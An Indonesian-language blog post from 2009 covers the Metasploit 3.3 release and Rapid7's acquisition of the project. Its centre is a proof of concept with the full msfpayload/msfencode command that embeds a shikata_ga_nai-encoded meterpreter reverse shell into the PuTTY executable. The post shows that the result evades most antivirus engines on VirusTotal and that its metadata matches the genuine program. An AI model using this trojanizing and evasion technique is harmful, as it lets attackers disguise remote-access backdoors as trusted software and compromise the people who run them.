.metasploit framework 3.3 released.
.sudah 363 hari sejak release notes metasploit 3.2 beredar,kerja keras dari dev-team ataupun kontribusi dari para freelance, menyebabkan perkembangan framework API berbasis ruby ini cukup pesat,ya spirit of the open source pr0ject-
.beberapa perubahan dalam release kali ini:
— 123 new exploits,117 auxiliary modules.
— dukungan terhadap ruby 1.9.1.
— performance dan stability lebih baik,peningkatan dalam proses startup framework.
— terintegrasi dengan OSVDB, exploit yang memiliki hubungan dengan OSVDB memiliki id referensi.
— compatiblitas terhadap OS 32-bit ataupun 64-bit baik unix,mac OS,windows.
— dukungan untuk JSP payloads, IPV6, NX dan DEP.
— meterpreter mendukung screenshot,keylogger, ataupun packet sniffing.
— msfencode dapat di embedded ke arbitry executables baik itu 32-bit ataupun 64-bit.
.for more info metasploit’s 3.3 release notes.
.masih ingat dengan artikel ini , meterpreter di encode XOR menggunakan shikata_ga_nai, dan lolos dari site virustotal.
.berikut POC dari msfencode embedded to arbitry executables.
[email protected]:/pentest/exploits/framework3$ ./msfconsole / / / (___ (___ ___ ___ ( ___ ___ | ) )| |___)|___ |___)| )|___)| ) |__/ _/ |__ |__ __/ | | |__ |// / =[ metasploit v3.4-dev [core:3.4 api:1.0] + -- --=[ 448 exploits - 216 auxiliary + -- --=[ 262 payloads - 22 encoders - 8 nops =[ svn r7564 updated today (2009.11.18) msf > version Framework: 3.4-dev.7554 Console : 3.4-dev.7537
——————————————–
[email protected]:/pentest/exploits/framework3$ ./msfpayload windows/meterpreter/reverse_tcp_allports LHOST=192.168.13.37 LPORT=443 R | ./msfencode -t exe -x /home/d0tz/putty.exe -o /home/d0tz/puttyw00t.exe [*] x86/shikata_ga_nai succeeded with size 102 (iteration=1)
.hasil scan virustotal 2/41.
.berikut merupakan hasil perbandingan metadata dari putty executable,
[email protected]:/pentest/exploits/framework3$ exiftool -a -u -g1 /home/d0tz/putty.exe ---- ExifTool ---- ExifTool Version Number : 7.89 ---- System ---- File Name : putty.exe Directory : /home/d0tz File Size : 444 kB File Modification Date/Time : 2009:11:08 22:36:28+07:00 ---- File ---- File Type : Win32 EXE MIME Type : application/octet-stream ---- EXE ---- Machine Type : Intel 386 or later, and compatibles Time Stamp : 2007:04:29 18:43:12+07:00 PE Type : PE32 Linker Version : 7.10 Code Size : 323584 Initialized Data Size : 155648 Uninitialized Data Size : 0 Entry Point : 0x4777f OS Version : 4.0 Image Version : 0.0 Subsystem Version : 4.0 Subsystem : Windows GUI File Version Number : 0.60.0.0 Product Version Number : 0.60.0.0 File Flags Mask : 0x000b File Flags : (none) File OS : Win32 Object File Type : Executable application File Subtype : 0 Language Code : English (British) Character Set : Unicode Company Name : Simon Tatham Product Name : PuTTY suite File Description : SSH, Telnet and Rlogin client Internal Name : PuTTY Original Filename : PuTTY File Version : Release 0.60 Product Version : Release 0.60 Legal Copyright : Copyright © 1997-2007 Simon Tatham. ------------------------------------------------------------------ [email protected]:/pentest/exploits/framework3$ exiftool -a -u -g1 /home/d0tz/puttyw00t.exe ---- ExifTool ---- ExifTool Version Number : 7.89 ---- System ---- File Name : puttyw00t.exe Directory : /home/d0tz File Size : 444 kB File Modification Date/Time : 2009:11:18 10:46:17+07:00 ---- File ---- File Type : Win32 EXE MIME Type : application/octet-stream ---- EXE ---- Machine Type : Intel 386 or later, and compatibles Time Stamp : 2007:04:29 18:43:12+07:00 PE Type : PE32 Linker Version : 7.10 Code Size : 323584 Initialized Data Size : 155648 Uninitialized Data Size : 0 Entry Point : 0x4c511 OS Version : 4.0 Image Version : 0.0 Subsystem Version : 4.0 Subsystem : Windows GUI File Version Number : 0.60.0.0 Product Version Number : 0.60.0.0 File Flags Mask : 0x000b File Flags : (none) File OS : Win32 Object File Type : Executable application File Subtype : 0 Language Code : English (British) Character Set : Unicode Company Name : Simon Tatham Product Name : PuTTY suite File Description : SSH, Telnet and Rlogin client Internal Name : PuTTY Original Filename : PuTTY File Version : Release 0.60 Product Version : Release 0.60 Legal Copyright : Copyright © 1997-2007 Simon Tatham.
.ya bisa dilihat, hanya ada perbedaan pada entry point,are this s0 epic guys??
.walaupun berita terakhir announcement rapid7 dan hdmoore mail menyebutkan, metasploit telah di akusisi oleh rapid7 memang ada beberapa persepektif tentang ikut ambilnya rapid7 dalam project ini,positifnya dev-team akan lebih pr0fessional imbasnya metasploit lebih stabil, dan release sebuah exploit pun akan jauh lebih cepet. negatifnya mungkin beberapa fitur yang lebih advance akan dikenakan biaya oleh rapid7 like nessus maybe damn!… [that’s just my opinion]
.kita liad saja konsekuensi dari para dev-team ataupun hd-moore apakah tetap menerapkan license 3-clause BSD atau akan mengikuti jejak immunity canvas maupun core-impact yang bersifat komersial.
.last w0rd, welcome metasploit 3.4 dev-
Leave a Reply